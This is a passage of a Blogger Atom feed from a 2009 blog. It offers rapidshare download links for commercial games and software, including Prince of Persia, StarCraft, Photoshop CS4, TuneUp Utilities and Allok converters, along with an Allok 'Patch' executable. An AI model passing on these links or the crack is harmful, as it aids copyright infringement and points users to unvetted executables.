href="http://rapidshare.com/files/194737744/Princeofpersia_2008.part30.rar"&gt;http://rapidshare.com/files/194737744/Princeofpersia_2008.part30.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194752146/Princeofpersia_2008.part31.rar"&gt;http://rapidshare.com/files/194752146/Princeofpersia_2008.part31.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194752163/Princeofpersia_2008.part32.rar"&gt;http://rapidshare.com/files/194752163/Princeofpersia_2008.part32.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194752187/Princeofpersia_2008.part33.rar"&gt;http://rapidshare.com/files/194752187/Princeofpersia_2008.part33.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194752208/Princeofpersia_2008.part34.rar"&gt;http://rapidshare.com/files/194752208/Princeofpersia_2008.part34.rar&lt;/a&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/194766423/Princeofpersia_2008.part35.rar"&gt;http://rapidshare.com/files/194766423/Princeofpersia_2008.part35.rar&lt;/a&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-3081161677186966310?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/3081161677186966310/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=3081161677186966310' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3081161677186966310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3081161677186966310'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/prince-of-persia-2008.html' title='Prince Of Persia (2008)'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb5CMuRFUhI/AAAAAAAAAG4/uSbinQh1kmw/s72-c/dfba6ea3.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-5409579685006760927</id><published>2009-03-16T05:02:00.000-07:00</published><updated>2009-03-28T00:43:45.951-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Games'/><title type='text'>Starcraft LAN Edition (PORTABLE)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5BKT9EYAI/AAAAAAAAAGw/-BbBbA94uVs/s1600-h/24px6b8.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5BKT9EYAI/AAAAAAAAAGw/-BbBbA94uVs/s400/24px6b8.jpg" alt="" id="BLOGGER_PHOTO_ID_5313756255754674178" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Info:&lt;/span&gt;&lt;br /&gt;It is compatible for multiplayer LAN Edition. Contains all the Broodwar release (Expanded Edition) characters. Campaign Mode is not included. You can play on a LAN with your friends or play with the bots in the Multiplayer Mode. Maps are included.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download:&lt;/span&gt;&lt;a href="http://rapidshare.com/files/164057736/Portable_StarCraft_LAN_Edition.rar"&gt;http://rapidshare.com/files/164057736/Portable_StarCraft_LAN_Edition.rar&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-5409579685006760927?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/5409579685006760927/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=5409579685006760927' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/5409579685006760927'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/5409579685006760927'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/starcraft-lan-edition-portable.html' title='Starcraft LAN Edition (PORTABLE)'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/Sb5BKT9EYAI/AAAAAAAAAGw/-BbBbA94uVs/s72-c/24px6b8.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-2099494607367545495</id><published>2009-03-15T23:43:00.000-07:00</published><updated>2009-03-28T00:42:39.610-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'></title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb3-6JM7reI/AAAAAAAAAFI/NWWpFJqjRhA/s1600-h/a.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 227px; height: 320px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb3-6JM7reI/AAAAAAAAAFI/NWWpFJqjRhA/s400/a.jpg" alt="" id="BLOGGER_PHOTO_ID_5313683410223082978" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;New CS4 Features:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Smoother panning and zooming and fluid canvas rotation (New)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Navigate to any area of an image with new, ultra-smooth zooming and panning. Maintain clarity as you zoom to individual pixels and easily edit at the highest magnification with the new Pixel Grid. And use the revolutionary new Rotate View tool to smoothly turn your canvas for distortion-free viewing at any angle.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sb3--nHLpDI/AAAAAAAAAFQ/Ll0A-yWX2Yg/s1600-h/a1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 210px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sb3--nHLpDI/AAAAAAAAAFQ/Ll0A-yWX2Yg/s400/a1.jpg" alt="" id="BLOGGER_PHOTO_ID_5313683486971503666" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Content-Aware Scaling (New)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Use the new and revolutionary Content-Aware Scaling feature to automatically recompose an image as you resize it, smartly preserving vital areas as the image adapts to the new dimensions. Get the perfect image in one step without time-intensive cropping and retouching.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb4BDqyhNnI/AAAAAAAAAGY/GZM54VhueeQ/s1600-h/a6.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb4BDqyhNnI/AAAAAAAAAGY/GZM54VhueeQ/s400/a6.jpg" alt="" id="BLOGGER_PHOTO_ID_5313685772881180274" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sb3_fsET_kI/AAAAAAAAAGI/TMh2QTj8cE8/s1600-h/a8.jpg"&gt;&lt;br /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Improved Adobe Photoshop Lightroom Workflow (Enhanced)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Select multiple photos in Adobe® Photoshop® Lightroom® software (sold separately) and automatically open them in Adobe Photoshop CS4 to merge them into a panorama, a high dynamic range (HDR) photo, or a multilayered Photoshop document. And seamlessly roundtrip back to Lightroom.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sb3_Qg6rLTI/AAAAAAAAAFw/l4_RkDtzLwY/s1600-h/a5.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sb3_Qg6rLTI/AAAAAAAAAFw/l4_RkDtzLwY/s400/a5.jpg" alt="" id="BLOGGER_PHOTO_ID_5313683794546076978" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Industry-leading color correction (Enhanced)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Enjoy dramatically enhanced color correction with reengineered Dodge, Burn, and Sponge tools that now intelligently preserve color and tone details.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb4CyrJ4M6I/AAAAAAAAAGg/AfOdS5rGhkA/s1600-h/a8.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb4CyrJ4M6I/AAAAAAAAAGg/AfOdS5rGhkA/s400/a8.jpg" alt="" id="BLOGGER_PHOTO_ID_5313687679944635298" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Better raw image processing (Enhanced)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Enjoy superior conversion quality as you process raw images with the industry-leading Adobe Photoshop Camera Raw 5 plug-in, which now offers localized corrections, post-crop vignetting, TIFF and JPEG processing, and support for more than 190 camera models.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb3_fVrnpyI/AAAAAAAAAGA/ZKWt0_NGmzM/s1600-h/a7.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb3_fVrnpyI/AAAAAAAAAGA/ZKWt0_NGmzM/s400/a7.jpg" alt="" id="BLOGGER_PHOTO_ID_5313684049228179234" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Auto-blending of images (Enhanced)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Combine a range of images, each with a different exposure, color, and focal point — with options to preserve tones and colors — into a single color-corrected image.&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sb3_QUmALEI/AAAAAAAAAFg/PXL4CKhn0ko/s1600-h/a3.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/Sb3_QUmALEI/AAAAAAAAAFg/PXL4CKhn0ko/s400/a3.jpg" alt="" id="BLOGGER_PHOTO_ID_5313683791238147138" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Adjustments panel (New)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Simplify image adjustment by easily accessing every tool you need to nondestructively adjust and enhance the color and tone of your images; on-image controls and a wide variety of presets are also included in the new live and dynamic Adjustments panel.&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb3_P3Ts2eI/AAAAAAAAAFY/TkkT6wJ9WoI/s1600-h/a2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb3_P3Ts2eI/AAAAAAAAAFY/TkkT6wJ9WoI/s400/a2.jpg" alt="" id="BLOGGER_PHOTO_ID_5313683783376755170" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;More powerful printing options (Enhanced)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Get outstanding prints with superior color management, tighter integration with leading printer models, and the ability to preview out-of-gamut image areas. Support for 16-bit printing on Mac OS offers increased color depth and clarity. &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb3_fk8e-oI/AAAAAAAAAGQ/-1KqbGULqDE/s1600-h/a9.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 150px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb3_fk8e-oI/AAAAAAAAAGQ/-1KqbGULqDE/s400/a9.jpg" alt="" id="BLOGGER_PHOTO_ID_5313684053325445762" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download:&lt;/span&gt;&lt;a href="http://rapidshare.com/files/174290587/photo_20shop_20cs4_CW.rar"&gt;http://rapidshare.com/files/174290587/photo_20shop_20cs4_CW.rar&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-2099494607367545495?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/2099494607367545495/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=2099494607367545495' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/2099494607367545495'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/2099494607367545495'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/new-cs4-features-smoother-panning-and.html' title=''/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nUlVy6CeF-o/Sb3-6JM7reI/AAAAAAAAAFI/NWWpFJqjRhA/s72-c/a.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-5802039863643615913</id><published>2009-03-15T23:27:00.000-07:00</published><updated>2009-03-28T00:42:33.015-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>TuneUp Utilities 2009 - Full version</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb3xuhmWJ9I/AAAAAAAAAFA/FmEONTi5DDE/s1600-h/fp76l3.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 256px; height: 256px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb3xuhmWJ9I/AAAAAAAAAFA/FmEONTi5DDE/s400/fp76l3.png" alt="" id="BLOGGER_PHOTO_ID_5313668916962535378" border="0" /&gt;&lt;/a&gt;You can easily solve PC problems and at the same prevent others while effectively increasing the system's performance with TuneUp Utilities. Your PC intelligently adapts to your individual needs. The new TuneUp Start page, the new TuneUp Speed Optimizer, and the improved 1-Click Maintenance make the optimization of your Windows system even easier, faster, and more comprehensive.&lt;br /&gt;&lt;br /&gt;Download:&lt;a href="http://rapidshare.com/files/179525523/TuneUp_Utilities_2009.rar"&gt;http://rapidshare.com/files/179525523/TuneUp_Utilities_2009.rar&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-5802039863643615913?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/5802039863643615913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=5802039863643615913' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/5802039863643615913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/5802039863643615913'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/tuneup-utilities-2009-full-version.html' title='TuneUp Utilities 2009 - Full version'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nUlVy6CeF-o/Sb3xuhmWJ9I/AAAAAAAAAFA/FmEONTi5DDE/s72-c/fp76l3.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-3986272288960481036</id><published>2009-03-12T00:31:00.000-07:00</published><updated>2009-03-28T00:41:40.768-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Allok all here....</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SbjCWRBezEI/AAAAAAAAAE4/lURMhkdW59s/s1600-h/0.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 375px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SbjCWRBezEI/AAAAAAAAAE4/lURMhkdW59s/s400/0.jpg" alt="" id="BLOGGER_PHOTO_ID_5312209448266026050" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3GP PSP MP4 iPod Tools | 6 Softwares | 31 mb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok Video to iPod Converter&lt;/span&gt;&lt;br /&gt;Convert all popular video and movie to MP4 format&lt;br /&gt;for iPod iPhone iPod Touch and Apple TV.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok Video to PSP Converter&lt;/span&gt;&lt;br /&gt;Convert all popular video and movie to MP4/AVC format&lt;br /&gt;for Sony PSP and PS3.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok Video to 3GP Converter&lt;/span&gt;&lt;br /&gt;Convert your favorite video and music to AVI, MP4, 3GP, 3G2 formats&lt;br /&gt;for your mobile phone.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok Video to MP4 Converter&lt;/span&gt;&lt;br /&gt;Convert videos for MP4 Player, iPod, iPhone, Apple TV,&lt;br /&gt;PSP, PS3, Zune, Xbox, Archos, PDA etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok MPEG4 Converter&lt;/span&gt;&lt;br /&gt;A powerful MPEG4 Converter and H264 Encoder.&lt;br /&gt;Supports allmost all video and audio formats.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok 3GP PSP MP4 iPod Video Converter&lt;/span&gt;&lt;br /&gt;AVI/3GP/MP4 file conversion for your portable media devices.&lt;br /&gt;&lt;br /&gt;Download:&lt;a href="http://rapidshare.com/files/200486787/A.l.l.o.k-3GP.PSP.MP4.iPod.exe"&gt;http://rapidshare.com/files/200486787/A.l.l.o.k-3GP.PSP.M&lt;/a&gt;&lt;a href="http://rapidshare.com/files/200486787/A.l.l.o.k-3GP.PSP.MP4.iPod.exe"&gt;P4.iP&lt;/a&gt;&lt;a href="http://rapidshare.com/files/200486787/A.l.l.o.k-3GP.PSP.MP4.iPod.exe"&gt;od.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sbi_mJuwspI/AAAAAAAAAEA/GEA6uplpRPI/s1600-h/00.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 260px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/Sbi_mJuwspI/AAAAAAAAAEA/GEA6uplpRPI/s400/00.jpg" alt="" id="BLOGGER_PHOTO_ID_5312206422651482770" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;DVD Creator Tools | 2 Softwares | 16.5 mb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok Video to DVD Burner&lt;/span&gt;&lt;br /&gt;Burn DVD disc directly from AVI, MPEG, WMV, ASF, MOV,&lt;br /&gt;RM, 3GP, MP4, FLV, MKV files.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;AVI DivX MPEG to DVD Converter&lt;/span&gt;&lt;br /&gt;Convert and burn AVI, DivX, MPEG, WMV, ASF&lt;br /&gt;into DVD disc watch them on home DVD Player.&lt;br /&gt;&lt;br /&gt;Download:&lt;a href="http://rapidshare.com/files/200489701/A.l.l.o.k-Audio.Conversion.exe"&gt;http://rapidshare.com/files/200491491/A.l.l.o.k-DVD.Creator.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/SbjAoCUlsaI/AAAAAAAAAEI/mzoh6SrKWrQ/s1600-h/000.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 260px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/SbjAoCUlsaI/AAAAAAAAAEI/mzoh6SrKWrQ/s400/000.jpg" alt="" id="BLOGGER_PHOTO_ID_5312207554534027682" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Audio Conversion Tools | 2 Softwares | 6.3 mb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok MP3 to AMR Converter&lt;/span&gt;&lt;br /&gt;Convert MP3 to AMR, WAV to AMR, AMR to&lt;br /&gt;MP3, AMR to WAV for your cell phone.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;AVI MPEG WMV RM to MP3 Converter&lt;/span&gt;&lt;br /&gt;Extrat audio from videos and RM to MP3 Converter&lt;br /&gt;&lt;br /&gt;Download:&lt;a href="http://rapidshare.com/files/200489701/A.l.l.o.k-Audio.Conversion.exe"&gt;http://rapidshare.com/files/200489701/A.l.l.o.k-Audio.Conversion.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/SbjBU7L76XI/AAAAAAAAAEg/nw6HKXZCcM4/s1600-h/0000.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 346px; height: 400px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/SbjBU7L76XI/AAAAAAAAAEg/nw6HKXZCcM4/s400/0000.jpg" alt="" id="BLOGGER_PHOTO_ID_5312208325712800114" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Video Editor tools | 4 Softwares | 26.8 mb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok Video Splitter&lt;br /&gt;&lt;/span&gt;Split a large AVI, MPEG, WMV, RM, MOV, FLV, 3GP,&lt;br /&gt;MP4 files into smaller clips in various format.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Allok Video Joiner&lt;/span&gt;&lt;br /&gt;Join or merge multiple AVI, MPEG, WMV, RM, MOV, 3GP,&lt;br /&gt;MP4, FLV, MKV files into one large file.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Fast AVI MPEG Splitter&lt;/span&gt;&lt;br /&gt;Split a large AVI, DivX, Xvid or MPEG file&lt;br /&gt;into smaller clips without recompression.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Fast AVI MPEG Joiner&lt;/span&gt;&lt;br /&gt;Join several AVI, DivX, Xvid or MPEG files into bigger&lt;br /&gt;one without recompression.&lt;br /&gt;&lt;br /&gt;Download:&lt;a href="http://rapidshare.com/files/200502817/A.l.l.o.k-Video.Editor.exe"&gt;http://rapidshare.com/files/200502817/A.l.l.o.k-Video.Editor.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/SbjBgXRsFzI/AAAAAAAAAEo/U19NMpYc868/s1600-h/00000.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 295px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/SbjBgXRsFzI/AAAAAAAAAEo/U19NMpYc868/s400/00000.jpg" alt="" id="BLOGGER_PHOTO_ID_5312208522231682866" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Video Conversion Tools | 8 softwares | 56 mb&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Video Converter&lt;/span&gt;&lt;br /&gt;An All-in-One video converting tool convert all videos&lt;br /&gt;to AVI MPEG WMV MP4 H264 3GP FLV.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;AVI MPEG Converter&lt;/span&gt;&lt;br /&gt;Convert video files between AVI DivX Xvid MPEG VCD&lt;br /&gt;DVD WMV ASF formats.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;Video to FLV Converter&lt;/span&gt;&lt;br /&gt;Flash Video Encoder to convert any video into&lt;br /&gt;SWF and FLV formats, SWF to FLV Converter&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;MOV Converter&lt;/span&gt;&lt;br /&gt;Convert MOV QT files to AVI DivX MPEG WMV&lt;br /&gt;DVD MP4 H264 3GP formats fast with high quality.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;QuickTime to AVI MPEG DVD Converter&lt;/span&gt;&lt;br /&gt;Convert QuickTime to AVI, MPEG, DVD,WMV,ASF,MP4,3GP,FLV etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;RM RMVB to AVI MPEG DVD Converter&lt;/span&gt;&lt;br /&gt;Convert RealMedia to AVI,MPEG, DVD,WMV,ASF,MP4,3GP,FLV etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;AVI to DVD SVCD VCD Converter&lt;/span&gt;&lt;br /&gt;Convert AVI, MPEG, WMV to DVD, SVCD, VCD formats that&lt;br /&gt;can be played on your VCD/DVD player.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:violet;"&gt;WMV to AVI MPEG DVD WMV Converter&lt;/span&gt;&lt;br /&gt;Convert WMV ASF to AVI, MPEG, DVD, MP4, 3GP, FLV formats.&lt;br /&gt;&lt;br /&gt;Download:&lt;a href="http://rapidshare.com/files/200498094/A.l.l.o.k-Video.Conversion.exe"&gt;http://rapidshare.com/files/200498094/A.l.l.o.k-Video.Conversion.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;All the Software Patch here:&lt;br /&gt;Download:&lt;a href="http://rapidshare.com/files/200502863/A.l.l.o.k-Patch.exe"&gt;http://rapidshare.com/files/200502863/A.l.l.o.k-Patch.exe&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-3986272288960481036?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/3986272288960481036/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=3986272288960481036' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3986272288960481036'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/3986272288960481036'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/allok-all-here.html' title='Allok all 